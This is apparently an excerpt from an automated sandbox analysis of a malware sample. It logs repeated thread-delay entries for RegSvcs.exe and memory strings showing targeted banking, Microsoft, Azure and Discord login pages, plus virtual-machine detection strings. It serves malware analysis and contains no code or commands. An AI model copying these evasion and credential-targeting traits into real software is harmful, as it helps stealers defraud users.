Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595797 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595687 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595468 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595358 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595249 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595029 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594270 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594028 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593872 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593765 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593638 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593531 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599437 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599328 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599108 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598999 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598780 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598124 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598015 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597906 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597796 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597687 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597467 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597359 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597250 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596702 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596540 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596436 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596327 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596213 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596107 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595998 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595885 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595661 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595510 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595406 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595296 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595187 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595078 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594967 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594859 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594750 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594640 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594531 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594421 |
Jump to behavior |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696501413o |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~ |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696501413j |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - COM.HKVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - COM.HKVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - HKVMware20,11696501413] |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - HKVMware20,11696501413] |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696501413j |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413x |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.comVMware20,11696501413} |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413} |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696501413s |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696501413f |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE |
Source: wscript.exe, 00000005.00000003.1519194604.0000020C81213000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^ |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413} |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.co.inVMware20,11696501413d |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413x |
Source: RegSvcs.exe, 00000003.00000002.3792778740.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3793148614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696501413s |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696501413t |
Source: wscript.exe, 00000005.00000003.1519194604.0000020C81213000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU WestVMware20,11696501413n |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.comVMware20,11696501413} |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696501413u |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU WestVMware20,11696501413n |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696501413u |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~ |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.co.inVMware20,11696501413d |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696501413 |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^ |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000038D1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696501413o |
Source: RegSvcs.exe, 00000007.00000002.3797631205.00000000035B2000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696501413f |